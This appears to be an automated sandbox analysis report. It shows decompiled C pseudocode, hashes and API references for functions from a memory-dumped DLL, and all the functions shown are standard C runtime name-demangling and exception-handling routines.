Instruction Fuzzy Hash: EC817F72D00649AFDF01CFD4C448AEDBBF6BB0E714F26405AE520AB241D7749A84EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A13D2, Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 178
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E6E1A13D2(void* __ebx, signed int* _a4, signed int* _a8) {
				signed int _v8;
				char _v12;
				signed int _v16;
				char* _v20;
				void* __esi;
				char _t60;
				void* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t66;
				intOrPtr* _t68;
				signed int _t69;
				intOrPtr* _t71;
				signed int _t77;
				intOrPtr* _t79;
				signed int _t91;
				signed int _t92;
				signed int _t95;
				signed int _t98;
				void* _t105;
				char* _t111;
				char* _t116;
				char* _t119;
				intOrPtr* _t121;
				signed int* _t122;

				_t110 = __ebx;
				_t111 =  *0x6e21304c; // 0x0
				_v12 = 0;
				_v8 = 0;
				_t60 =  *_t111;
				if(_t60 == 0) {
					L15:
					E6E19D85E(_t111, _a4, 1, _a8);
					L16:
					L17:
					return _a4;
				}
				_t63 = _t60 - 0x24;
				if(_t63 == 0) {
					_t64 =  *((intOrPtr*)(_t111 + 1));
					__eflags = _t64 - 0x24;
					if(_t64 == 0x24) {
						_t111 = _t111 + 2;
						 *0x6e21304c = _t111;
						_t65 =  *_t111;
						__eflags = _t65 - 0x52;
						if(__eflags > 0) {
							_t66 = _t65 - 0x53;
							__eflags = _t66;
							if(_t66 == 0) {
								_t55 = _t111 + 1; // -1
								 *0x6e21304c = _t55;
								L45:
								_t68 = _a4;
								 *((intOrPtr*)(_t68 + 4)) = 0;
								 *((char*)(_t68 + 4)) = 2;
								 *_t68 = 0;
								return _t68;
							}
							_t69 = _t66 - 1;
							__eflags = _t69;
							if(_t69 == 0) {
								_t45 = _t111 + 1; // -1
								 *0x6e21304c = _t45;
								_t71 = _a8;
								__eflags =  *_t71;
								if( *_t71 == 0) {
									_v20 = "std::nullptr_t";
									_v16 = 0xe;
									E6E19D46F(_a4,  &_v20);
									goto L17;
								}
								_v20 = "std::nullptr_t ";
								_v16 = 0xf;
								E6E19D811(_t111, _a4,  &_v20, _t71);
								goto L16;
							}
							_t77 = _t69;
							__eflags = _t77;
							if(_t77 == 0) {
								_t121 = _a8;
								_t41 = _t111 + 1; // -1
								 *0x6e21304c = _t41;
								_t79 = _a4;
								 *_t79 =  *_t121;
								 *((intOrPtr*)(_t79 + 4)) =  *((intOrPtr*)(_t121 + 4));
								return _t79;
							}
							__eflags = _t77 - 3;
							if(__eflags != 0) {
								goto L45;
							}
							_t39 = _t111 + 1; // -1
							 *0x6e21304c = _t39;
							E6E1A1DC5(0, __eflags, _a4);
							L6:
							goto L17;
						}
						_t122 = _a8;
						if(__eflags == 0) {
							_t116 =  &_v12;
							_push( &_v20);
							__eflags =  *_t122;
							if( *_t122 == 0) {
								_v20 = "volatile";
								_v16 = 8;
							} else {
								_v20 = "volatile ";
								_v16 = 9;
							}
							E6E19D731(_t116);
							_t111 =  *0x6e21304c; // 0x0
							L34:
							_push(3);
							L12:
							_v20 =  *_t122;
							 *0x6e21304c = _t111 + 1;
							_v16 =  *(_t122 + 4) | 0x00000100;
							_push( &_v20);
							_push( &_v12);
							_push(_a4);
							E6E1A178E(_t110);
							goto L17;
						}
						_t91 = _t65;
						__eflags = _t91;
						if(_t91 == 0) {
							goto L15;
						}
						_t92 = _t91 - 0x41;
						__eflags = _t92;
						if(_t92 == 0) {
							_t31 = _t111 + 1; // -1
							 *0x6e21304c = _t31;
							E6E1A0748(_a4, _t122);
							L5:
							goto L6;
						}
						_t95 = _t92 - 1;
						__eflags = _t95;
						if(_t95 == 0) {
							_t29 = _t111 + 1; // -1
							 *0x6e21304c = _t29;
							E6E1A1621(__ebx, _t122, _a4, _t122, 1);
							goto L16;
						}
						_t98 = _t95 - 1;
						__eflags = _t98;
						if(_t98 == 0) {
							_t22 = _t111 + 1; // -1
							_v20 = 0;
							 *0x6e21304c = _t22;
							_v16 = 0;
							E6E19EF3E(_a4, E6E19F5FF(_t111,  &_v12, _t122, 0,  &_v20, 0));
							goto L17;
						}
						__eflags = _t98 == 0xe;
						if(_t98 == 0xe) {
							goto L34;
						}
						goto L45;
					}
					__eflags = _t64;
					if(_t64 != 0) {
						goto L45;
					}
					goto L15;
				}
				_t122 = _a8;
				_t105 = _t63 - 0x1d;
				if(_t105 == 0) {
					L11:
					_push(2);
					goto L12;
				}
				if(_t105 == 1) {
					_t119 =  &_v12;
					_push( &_v20);
					__eflags =  *_t122;
					if( *_t122 == 0) {
						_v20 = "volatile";
						_v16 = 8;
					} else {
						_v20 = "volatile ";
						_v16 = 9;
					}
					E6E19D731(_t119);
					_t111 =  *0x6e21304c; // 0x0
					goto L11;
				}
				E6E19EF3E(_a4, _t122);
				goto L5;
			}

0x6e1a13d2
0x6e1a13d8
0x6e1a13e1
0x6e1a13e4
0x6e1a13ea
0x6e1a13ec
0x6e1a1485
0x6e1a148d
0x6e1a1492
0x6e1a1495
0x00000000
0x6e1a1495
0x6e1a13f2
0x6e1a13f5
0x6e1a1476
0x6e1a1479
0x6e1a147b
0x6e1a149b
0x6e1a149e
0x6e1a14a4
0x6e1a14a7
0x6e1a14aa
0x6e1a156b
0x6e1a156b
0x6e1a156e
0x6e1a1608
0x6e1a160b
0x6e1a1610
0x6e1a1610
0x6e1a1613
0x6e1a1616
0x6e1a161a
0x00000000
0x6e1a161a
0x6e1a1574
0x6e1a1574
0x6e1a1577
0x6e1a15ba
0x6e1a15bd
0x6e1a15c2
0x6e1a15c5
0x6e1a15c7
0x6e1a15f0
0x6e1a15f7
0x6e1a15fe
0x00000000
0x6e1a15fe
0x6e1a15cd
0x6e1a15d8
0x6e1a15df
0x00000000
0x6e1a15df
0x6e1a157a
0x6e1a157a
0x6e1a157d
0x6e1a159d
0x6e1a15a0
0x6e1a15a3
0x6e1a15a8
0x6e1a15ad
0x6e1a15b2
0x00000000
0x6e1a15b2
0x6e1a157f
0x6e1a1582
0x00000000
0x00000000
0x6e1a158b
0x6e1a158e
0x6e1a1593
0x6e1a140e
0x00000000
0x6e1a140e
0x6e1a14b0
0x6e1a14b3
0x6e1a1533
0x6e1a1536
0x6e1a1537
0x6e1a1539
0x6e1a154b
0x6e1a1552
0x6e1a153b
0x6e1a153b
0x6e1a1542
0x6e1a1542
0x6e1a1559
0x6e1a155e
0x6e1a1564
0x6e1a1564
0x6e1a144a
0x6e1a144d
0x6e1a1458
0x6e1a145e
0x6e1a1464
0x6e1a1468
0x6e1a1469
0x6e1a146c
0x00000000
0x6e1a1471
0x6e1a14b5
0x6e1a14b5
0x6e1a14b7
0x00000000
0x00000000
0x6e1a14b9
0x6e1a14b9
0x6e1a14bc
0x6e1a151e
0x6e1a1521
0x6e1a1526
0x6e1a140d
0x00000000
0x6e1a140d
0x6e1a14be
0x6e1a14be
0x6e1a14c1
0x6e1a1508
0x6e1a150b
0x6e1a1510
0x00000000
0x6e1a1510
0x6e1a14c3
0x6e1a14c3
0x6e1a14c6
0x6e1a14d6
0x6e1a14d9
0x6e1a14dd
0x6e1a14ea
0x6e1a14f8
0x00000000
0x6e1a14fd
0x6e1a14c8
0x6e1a14cb
0x00000000
0x00000000
0x00000000
0x6e1a14d1
0x6e1a147d
0x6e1a147f
0x00000000
0x00000000
0x00000000
0x6e1a147f
0x6e1a13f7
0x6e1a13fa
0x6e1a13fd
0x6e1a1448
0x6e1a1448
0x00000000
0x6e1a1448
0x6e1a1402
0x6e1a1417
0x6e1a141a
0x6e1a141b
0x6e1a141d
0x6e1a142f
0x6e1a1436
0x6e1a141f
0x6e1a141f
0x6e1a1426
0x6e1a1426
0x6e1a143d
0x6e1a1442
0x00000000
0x6e1a1442
0x6e1a1408
0x00000000

APIs

shared_ptr.LIBCMT ref: 6E1A143D
operator+.LIBVCRUNTIME ref: 6E1A148D
shared_ptr.LIBCMT ref: 6E1A1559
operator+.LIBVCRUNTIME ref: 6E1A15DF

Strings

|T n, xrefs: 6E1A154B
pT n, xrefs: 6E1A1530

Memory Dump Source

Source File: 00000001.00000002.645916064.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000001.00000002.645911367.000000006E190000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.645983742.000000006E204000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.646001738.000000006E212000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.646024059.000000006E232000.00000002.00020000.sdmp Download File

Similarity

API ID: operator+shared_ptr
String ID: pT n$|T n
API String ID: 864562889-2115928515
Opcode ID: e93f95fb2628190ec7980e8624d26aecfa2fb0f3d6311a37dec5917ca33625d7
Instruction ID: e9f460ecf8422722b22d0cbb1d86eb62038ace3ca1926445a808cc2d24bdf594
Opcode Fuzzy Hash: e93f95fb2628190ec7980e8624d26aecfa2fb0f3d6311a37dec5917ca33625d7
Instruction Fuzzy Hash: B6614BF8A0420AEECF00CFEDC444AF97BBABB06314F14855AD6589B211D775D689EF60

Uniqueness

Uniqueness Score: -1.00%

Function 6E19ECE6, Relevance: 10.7, APIs: 7, Instructions: 151
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E6E19ECE6(void* __ebx, intOrPtr* _a4, intOrPtr* _a8) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				signed int _v24;
				char _v28;
				char _v36;
				char _v44;
				void* __edi;
				char* _t50;
				void* _t54;
				intOrPtr* _t57;
				void* _t62;
				intOrPtr* _t68;
				intOrPtr* _t69;
				char* _t73;
				void* _t77;
				void* _t78;
				intOrPtr* _t83;
				char* _t88;
				intOrPtr* _t104;
				void* _t108;
				void* _t113;
				char _t115;
				void* _t118;
				void* _t119;
				void* _t123;

				_t50 =  *0x6e21304c; // 0x0
				_t119 = _t118 - 0x28;
				if( *_t50 == 0) {
					_t51 = _a8;
					_t115 = 0;
					if( *_a8 == 0) {
						goto L16;
					} else {
						_v28 = ")[";
						_v24 = 2;
						_t54 = E6E19D908(E6E19D880(E6E19D833(_t85,  &_v44, 0x28, _t51),  &_v36,  &_v28),  &_v20, 1);
						_t88 =  &_v12;
						goto L17;
					}
					L21:
				} else {
					_t113 = E6E1A0C95();
					_t123 = _t113;
					if(_t123 < 0 || _t123 == 0) {
						_t115 = 0;
						L16:
						_v12 = _t115;
						_v8 = _t115;
						E6E19E994( &_v12, 0x5b);
						_t54 = E6E19D908( &_v12,  &_v44, 1);
						_t88 =  &_v36;
						L17:
						E6E19EF3E(_a4, E6E19D8C4(_t54, _t88, 0x5d));
						_t57 = _a4;
					} else {
						_t83 = _a8;
						_v12 = 0;
						_v8 = 0;
						if(( *(_t83 + 4) & 0x00000800) == 0) {
							L5:
							_t62 = _t113;
							_t113 = _t113 - 1;
							if(_t62 != 0) {
								_t73 =  *0x6e21304c; // 0x0
								if( *_t73 != 0) {
									_t77 = E6E19D833(_t85,  &_v36, 0x5b, E6E1A0004(_t108, _t113,  &_v20, 0));
									_t119 = _t119 + 0x14;
									_t78 = E6E19D8C4(_t77,  &_v44, 0x5d);
									_t85 =  &_v12;
									E6E19D99C( &_v12, _t78);
									goto L8;
								}
							}
						} else {
							_v20 = 0x6e204cdc;
							_t85 =  &_v12;
							_v16 = 2;
							E6E19D944( &_v12,  &_v20);
							L8:
							if(_v8 <= 1) {
								goto L5;
							}
						}
						if( *_t83 != 0) {
							if(( *(_t83 + 4) & 0x00000800) == 0) {
								_t68 = E6E19D8C4(E6E19D833(_t85,  &_v44, 0x28, _t83),  &_v36, 0x29);
								_push( &_v12);
								_push( &_v20);
								_t104 = _t68;
							} else {
								_t104 = _t83;
								_push( &_v12);
								_push( &_v44);
							}
							_t69 = E6E19D8A2(_t104);
							_v12 =  *_t69;
							_v8 =  *((intOrPtr*)(_t69 + 4));
						}
						E6E1A13D2(_t83,  &_v28,  &_v12);
						_t57 = _a4;
						 *_t57 = _v28;
						 *(_t57 + 4) = _v24 | 0x00000800;
					}
				}
				return _t57;
				goto L21;
			}

0x6e19ece9
0x6e19ecee
0x6e19ecf6
0x6e19ee3c
0x6e19ee3f
0x6e19ee43
0x00000000
0x6e19ee45
0x6e19ee49
0x6e19ee53
0x6e19ee79
0x6e19ee7e
0x00000000
0x6e19ee7e
0x00000000
0x6e19ecfc
0x6e19ed01
0x6e19ed03
0x6e19ed05
0x6e19edfd
0x6e19edff
0x6e19ee04
0x6e19ee07
0x6e19ee0a
0x6e19ee18
0x6e19ee1d
0x6e19ee20
0x6e19ee2e
0x6e19ee33
0x6e19ed11
0x6e19ed12
0x6e19ed17
0x6e19ed1a
0x6e19ed24
0x6e19ed42
0x6e19ed42
0x6e19ed44
0x6e19ed47
0x6e19ed49
0x6e19ed51
0x6e19ed64
0x6e19ed69
0x6e19ed74
0x6e19ed7a
0x6e19ed7d
0x00000000
0x6e19ed7d
0x6e19ed51
0x6e19ed26
0x6e19ed29
0x6e19ed31
0x6e19ed34
0x6e19ed3b
0x6e19ed82
0x6e19ed86
0x00000000
0x00000000
0x6e19ed86
0x6e19ed8a
0x6e19ed93
0x6e19edb8
0x6e19edc0
0x6e19edc4
0x6e19edc5
0x6e19ed95
0x6e19ed98
0x6e19ed9a
0x6e19ed9e
0x6e19ed9e
0x6e19edc7
0x6e19edce
0x6e19edd4
0x6e19edd4
0x6e19eddf
0x6e19ede4
0x6e19edf5
0x6e19edf7
0x6e19edfa
0x6e19ed05
0x6e19ee3b
0x00000000

APIs

DName::operator+.LIBCMT ref: 6E19ED74
DName::operator+.LIBCMT ref: 6E19EDC7

Part of subcall function 6E19D944: shared_ptr.LIBCMT ref: 6E19D960

Part of subcall function 6E19D833: DName::operator+.LIBCMT ref: 6E19D854

DName::operator+.LIBCMT ref: 6E19EDB8
DName::operator+.LIBCMT ref: 6E19EE18
DName::operator+.LIBCMT ref: 6E19EE25
DName::operator+.LIBCMT ref: 6E19EE6C
DName::operator+.LIBCMT ref: 6E19EE79

Memory Dump Source

Source File: 00000001.00000002.645916064.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000001.00000002.645911367.000000006E190000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.645983742.000000006E204000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.646001738.000000006E212000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.646024059.000000006E232000.00000002.00020000.sdmp Download File

Similarity

API ID: Name::operator+$shared_ptr
String ID:
API String ID: 1037112749-0
Opcode ID: ff9b051e1253ac7e869e2a7b377224e891557326ee389825d65a317fc218ad8d
Instruction ID: ee9678464e06545540f87f0d9accbb8828ad1c7abf64925815eddabe40333411
Opcode Fuzzy Hash: ff9b051e1253ac7e869e2a7b377224e891557326ee389825d65a317fc218ad8d
Instruction Fuzzy Hash: 65516DB1900219AFDB05DFE4C851EEEBBFCBF58714F14445AE505A7180EB74AB84EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E19BA00, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E6E19BA00(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				signed int _t49;
				char _t52;
				signed int _t59;
				intOrPtr _t60;
				void* _t61;
				intOrPtr* _t62;
				intOrPtr _t64;
				intOrPtr _t67;
				intOrPtr _t72;
				intOrPtr* _t76;
				intOrPtr _t77;
				intOrPtr _t79;
				signed int _t82;
				char _t84;
				intOrPtr _t87;
				intOrPtr _t96;
				intOrPtr _t99;
				intOrPtr* _t101;
				void* _t105;
				void* _t107;
				void* _t114;

				_t76 = _a4;
				_v5 = 0;
				_v16 = 1;
				 *_t76 = E6E1CD4B2(__ecx,  *_t76);
				_t77 = _a8;
				_t6 = _t77 + 0x10; // 0x11
				_t99 = _t6;
				_t49 =  *(_t77 + 8) ^  *0x6e212008;
				_push(_t99);
				_push(_t49);
				_v20 = _t99;
				_v12 = _t49;
				E6E19B9C0();
				E6E19CF37(_a12);
				_t52 = _a4;
				_t107 = _t105 - 0x1c + 0x10;
				_t96 =  *((intOrPtr*)(_t77 + 0xc));
				if(( *(_t52 + 4) & 0x00000066) != 0) {
					__eflags = _t96 - 0xfffffffe;
					if(_t96 != 0xfffffffe) {
						E6E19D11C(_t77, 0xfffffffe, _t99, 0x6e212008);
						goto L13;
					}
					goto L14;
				} else {
					_v32 = _t52;
					_v28 = _a12;
					 *((intOrPtr*)(_t77 - 4)) =  &_v32;
					if(_t96 == 0xfffffffe) {
						L14:
						return _v16;
					} else {
						do {
							_t82 = _v12;
							_t59 = _t96 + (_t96 + 2) * 2;
							_t79 =  *((intOrPtr*)(_t82 + _t59 * 4));
							_t60 = _t82 + _t59 * 4;
							_t83 =  *((intOrPtr*)(_t60 + 4));
							_v24 = _t60;
							if( *((intOrPtr*)(_t60 + 4)) == 0) {
								_t84 = _v5;
								goto L7;
							} else {
								_t61 = E6E19D0CC(_t83, _t99);
								_t84 = 1;
								_v5 = 1;
								_t114 = _t61;
								if(_t114 < 0) {
									_v16 = 0;
									L13:
									_push(_t99);
									_push(_v12);
									E6E19B9C0();
									goto L14;
								} else {
									if(_t114 > 0) {
										_t62 = _a4;
										__eflags =  *_t62 - 0xe06d7363;
										if( *_t62 == 0xe06d7363) {
											__eflags =  *0x6e204868;
											if(__eflags != 0) {
												_t72 = E6E1CAC10(__eflags, 0x6e204868);
												_t107 = _t107 + 4;
												__eflags = _t72;
												if(_t72 != 0) {
													_t101 =  *0x6e204868; // 0x6e19b685
													 *0x6e204228(_a4, 1);
													 *_t101();
													_t99 = _v20;
													_t107 = _t107 + 8;
												}
												_t62 = _a4;
											}
										}
										E6E19D100(_t62, _a8, _t62);
										_t64 = _a8;
										__eflags =  *((intOrPtr*)(_t64 + 0xc)) - _t96;
										if( *((intOrPtr*)(_t64 + 0xc)) != _t96) {
											E6E19D11C(_t64, _t96, _t99, 0x6e212008);
											_t64 = _a8;
										}
										_push(_t99);
										_push(_v12);
										 *((intOrPtr*)(_t64 + 0xc)) = _t79;
										E6E19B9C0();
										_t87 =  *((intOrPtr*)(_v24 + 8));
										E6E19D0E4();
										asm("int3");
										__eflags = E6E19D133();
										if(__eflags != 0) {
											_t67 = E6E19BFF6(_t87, __eflags);
											__eflags = _t67;
											if(_t67 != 0) {
												return 1;
											} else {
												E6E19D184();
												goto L24;
											}
										} else {
											L24:
											__eflags = 0;
											return 0;
										}
									} else {
										goto L7;
									}
								}
							}
							goto L28;
							L7:
							_t96 = _t79;
						} while (_t79 != 0xfffffffe);
						if(_t84 != 0) {
							goto L13;
						}
						goto L14;
					}
				}
				L28:
			}

0x6e19ba07
0x6e19ba0c
0x6e19ba12
0x6e19ba1e
0x6e19ba20
0x6e19ba26
0x6e19ba26
0x6e19ba29
0x6e19ba2f
0x6e19ba30
0x6e19ba31
0x6e19ba34
0x6e19ba37
0x6e19ba3f
0x6e19ba44
0x6e19ba47
0x6e19ba4a
0x6e19ba51
0x6e19baad
0x6e19bab0
0x6e19babf
0x00000000
0x6e19babf
0x00000000
0x6e19ba53
0x6e19ba53
0x6e19ba59
0x6e19ba5f
0x6e19ba65
0x6e19bad0
0x6e19bad9
0x6e19ba67
0x6e19ba67
0x6e19ba67
0x6e19ba6d
0x6e19ba70
0x6e19ba73
0x6e19ba76
0x6e19ba79
0x6e19ba7e
0x6e19ba94
0x00000000
0x6e19ba80
0x6e19ba82
0x6e19ba87
0x6e19ba89
0x6e19ba8c
0x6e19ba8e
0x6e19baa4
0x6e19bac4
0x6e19bac4
0x6e19bac5
0x6e19bac8
0x00000000
0x6e19ba90
0x6e19ba90
0x6e19bada
0x6e19badd
0x6e19bae3
0x6e19bae5
0x6e19baec
0x6e19baf3
0x6e19baf8
0x6e19bafb
0x6e19bafd
0x6e19baff
0x6e19bb0c
0x6e19bb12
0x6e19bb14
0x6e19bb17
0x6e19bb17
0x6e19bb1a
0x6e19bb1a
0x6e19baec
0x6e19bb22
0x6e19bb27
0x6e19bb2a
0x6e19bb2d
0x6e19bb39
0x6e19bb3e
0x6e19bb3e
0x6e19bb41
0x6e19bb42
0x6e19bb45
0x6e19bb48
0x6e19bb55
0x6e19bb58
0x6e19bb5d
0x6e19bb63
0x6e19bb65
0x6e19bb6a
0x6e19bb6f
0x6e19bb71
0x6e19bb7c
0x6e19bb73
0x6e19bb73
0x00000000
0x6e19bb73
0x6e19bb67
0x6e19bb67
0x6e19bb67
0x6e19bb69
0x6e19bb69
0x6e19ba92
0x00000000
0x6e19ba92
0x6e19ba90
0x6e19ba8e
0x00000000
0x6e19ba97
0x6e19ba97
0x6e19ba99
0x6e19baa0
0x00000000
0x6e19baa2
0x00000000
0x6e19baa0
0x6e19ba65
0x00000000

APIs

_ValidateLocalCookies.LIBCMT ref: 6E19BA37
___except_validate_context_record.LIBVCRUNTIME ref: 6E19BA3F
_ValidateLocalCookies.LIBCMT ref: 6E19BAC8
__IsNonwritableInCurrentImage.LIBCMT ref: 6E19BAF3
_ValidateLocalCookies.LIBCMT ref: 6E19BB48

Strings

csm, xrefs: 6E19BADD

Memory Dump Source

Source File: 00000001.00000002.645916064.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000001.00000002.645911367.000000006E190000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.645983742.000000006E204000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.646001738.000000006E212000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.646024059.000000006E232000.00000002.00020000.sdmp Download File

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: c52e662cadb1ed99f2d8d2bfbc377383f11851857151e969a19d63f78b85065f
Instruction ID: 359cec17e0e5c80b342f223757edfb6e7ef363e7e83be190114067f4caf9b731
Opcode Fuzzy Hash: c52e662cadb1ed99f2d8d2bfbc377383f11851857151e969a19d63f78b85065f
Instruction Fuzzy Hash: FD41C234A00209ABCF00CFA8C894EDEBBB5FF55318F108559E8199B395D731AA81EB94

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A0004, Relevance: 10.6, APIs: 7, Instructions: 102
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E6E1A0004(void* __edx, void* __edi, intOrPtr* _a4, char _a8) {
				intOrPtr _v8;
				char _v12;
				char _v20;
				char _v28;
				char _v36;
				intOrPtr _v40;
				char _v44;
				void* __ebx;
				void* __esi;
				intOrPtr _t24;
				char* _t27;
				intOrPtr* _t28;
				intOrPtr* _t29;
				void* _t30;
				intOrPtr _t33;
				char _t38;
				intOrPtr* _t40;
				char _t42;
				char* _t45;
				char* _t46;
				void* _t55;
				intOrPtr* _t56;
				void* _t57;
				void* _t58;

				_t57 = __edi;
				_t55 = __edx;
				_t40 =  *0x6e21304c; // 0x0
				_t38 = 0;
				if( *_t40 == 0x51) {
					_t38 = 1;
					_t40 = _t40 + 1;
					 *0x6e21304c = _t40;
				}
				_t24 =  *_t40;
				if(_t24 != 0) {
					_push(_t58);
					if(_t24 < 0x30 || _t24 > 0x39) {
						E6E1A2E13(_t40,  &_v44);
						if(_v36 == 0) {
							_t27 =  *0x6e21304c; // 0x0
							if( *_t27 != 0) {
								_t42 = 0;
								_v8 = 2;
								_v12 = 0;
								_t56 =  &_v12;
							} else {
								_t29 = E6E19D50F( &_v36, 1);
								goto L22;
							}
						} else {
							_push(_v40);
							 *0x6e21304c =  *0x6e21304c + 1;
							_push(_v44);
							if(_a8 == 0) {
								if(_t38 == 0) {
									_t45 =  &_v20;
									goto L11;
								} else {
									_t46 =  &_v36;
									goto L8;
								}
							} else {
								if(_t38 == 0) {
									_t29 = E6E19D559(_t38,  &_v20, _t57, _t58);
									goto L22;
								} else {
									_t30 = E6E19D559(_t38,  &_v36, _t57, _t58);
									goto L9;
								}
							}
							goto L23;
						}
					} else {
						_t33 = _t24;
						if(_t38 == 0) {
							asm("cdq");
							asm("adc edx, 0xffffffff");
							_push(_t55);
							 *0x6e21304c = _t40 + 1;
							_t45 =  &_v36;
							_push(_t33 + 0xffffffd1);
							L11:
							_t29 = E6E19D5E5(_t38, _t45, _t57, _t58);
							L22:
							_t56 = _t29;
						} else {
							asm("cdq");
							_push(_t55);
							 *0x6e21304c = _t40 + 1;
							_t46 =  &_v20;
							_push(_t33 - 0x2f);
							L8:
							_t30 = E6E19D5E5(_t38, _t46, _t57, _t58);
							L9:
							E6E19D8A2(E6E19D46F( &_v28, 0x6e212030),  &_v12, _t30);
							_t56 =  &_v12;
						}
						L23:
						_t42 =  *_t56;
					}
					_t28 = _a4;
					 *_t28 = _t42;
					_t22 = _t56 + 4; // 0x40006e21
					 *((intOrPtr*)(_t28 + 4)) =  *_t22;
				} else {
					E6E19D50F(_a4, 1);
					_t28 = _a4;
				}
				return _t28;
			}

0x6e1a0004
0x6e1a0004
0x6e1a0007
0x6e1a0011
0x6e1a0016
0x6e1a0018
0x6e1a001a
0x6e1a001b
0x6e1a001b
0x6e1a0021
0x6e1a0025
0x6e1a0039
0x6e1a003c
0x6e1a009c
0x6e1a00a6
0x6e1a00e3
0x6e1a00eb
0x6e1a00fd
0x6e1a00ff
0x6e1a0106
0x6e1a0109
0x6e1a00ed
0x6e1a00f2
0x00000000
0x6e1a00f2
0x6e1a00a8
0x6e1a00a8
0x6e1a00ab
0x6e1a00b5
0x6e1a00b8
0x6e1a00d4
0x6e1a00de
0x00000000
0x6e1a00d6
0x6e1a00d6
0x00000000
0x6e1a00d6
0x6e1a00ba
0x6e1a00bc
0x6e1a00cb
0x00000000
0x6e1a00be
0x6e1a00c1
0x00000000
0x6e1a00c1
0x6e1a00bc
0x00000000
0x6e1a00b8
0x6e1a0042
0x6e1a0042
0x6e1a0047
0x6e1a007e
0x6e1a0082
0x6e1a0086
0x6e1a0087
0x6e1a008d
0x6e1a0090
0x6e1a0091
0x6e1a0091
0x6e1a00f7
0x6e1a00f7
0x6e1a0049
0x6e1a004d
0x6e1a004e
0x6e1a004f
0x6e1a0055
0x6e1a0058
0x6e1a0059
0x6e1a0059
0x6e1a005e
0x6e1a0074
0x6e1a0079
0x6e1a0079
0x6e1a00f9
0x6e1a00f9
0x6e1a00f9
0x6e1a010c
0x6e1a0110
0x6e1a0112
0x6e1a0115
0x6e1a0027
0x6e1a002c
0x6e1a0031
0x6e1a0031
0x6e1a011a

APIs

DName::DName.LIBVCRUNTIME ref: 6E1A002C
DName::DName.LIBVCRUNTIME ref: 6E1A0059

Part of subcall function 6E19D5E5: __aulldvrm.LIBCMT ref: 6E19D616

DName::operator+.LIBCMT ref: 6E1A0074
DName::DName.LIBVCRUNTIME ref: 6E1A0091
DName::DName.LIBVCRUNTIME ref: 6E1A00C1
DName::DName.LIBVCRUNTIME ref: 6E1A00CB
DName::DName.LIBVCRUNTIME ref: 6E1A00F2

Memory Dump Source

Source File: 00000001.00000002.645916064.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000001.00000002.645911367.000000006E190000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.645983742.000000006E204000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.646001738.000000006E212000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.646024059.000000006E232000.00000002.00020000.sdmp Download File

Similarity

API ID: NameName::$Name::operator+__aulldvrm
String ID:
API String ID: 4069495278-0
Opcode ID: 0e723276cb0a093e68e5dca0a7bb579d3b419b2998b4b0bc8b1f13c282e87a1b
Instruction ID: 2f552248873ad5763a6f287424360c0e8b3855b556923d372d3a6eead5bbc225
Opcode Fuzzy Hash: 0e723276cb0a093e68e5dca0a7bb579d3b419b2998b4b0bc8b1f13c282e87a1b
Instruction Fuzzy Hash: F3319075944204AFDF08CFECC954AFD7BBBAB1A354F10844DE24167180EB75AAC9EB21

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A065C, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 85
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E6E1A065C(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8) {
				signed int _v8;
				long _v76;
				char _v80;
				long long _v84;
				char _v92;
				char _v96;
				void* _v100;
				signed int _t24;
				intOrPtr _t26;
				char* _t29;
				intOrPtr* _t30;
				intOrPtr* _t45;
				void* _t46;
				long long _t47;
				intOrPtr* _t58;
				signed int _t59;
				long long* _t60;
				long long _t64;

				_t24 =  *0x6e212008; // 0xa172442e
				_v8 = _t24 ^ _t59;
				_t45 =  *0x6e21304c; // 0x0
				_t58 = _a4;
				_t26 =  *_t45;
				if(_t26 != 0) {
					if(_t26 < 0x30 || _t26 > 0x39) {
						E6E1A2E13(_t45,  &_v100);
						_pop(_t46);
						if(_v92 == 0) {
							L11:
							_t29 =  *0x6e21304c; // 0x0
							if( *_t29 != 0) {
								_t47 = 0;
								_v80 = 2;
								_v84 = 0;
								_t30 =  &_v84;
							} else {
								_t30 = E6E19D50F( &_v84, 1);
								_t47 =  *_t30;
							}
							 *_t58 = _t47;
							 *((intOrPtr*)(_t58 + 4)) =  *((intOrPtr*)(_t30 + 4));
						} else {
							_v84 = _v100;
							_v80 = _v96;
							if(_a8 != 0x42) {
								if(_a8 != 0x41) {
									goto L11;
								} else {
									_t64 = _v84;
									goto L8;
								}
							} else {
								_t64 = _v84;
								L8:
								 *_t60 = _t64;
								swprintf( &_v76, 0x41, "%lf", _t46, _t46);
								_v80 = 0;
								_push(_v80);
								E6E19D216(_t58,  &_v76);
							}
						}
					} else {
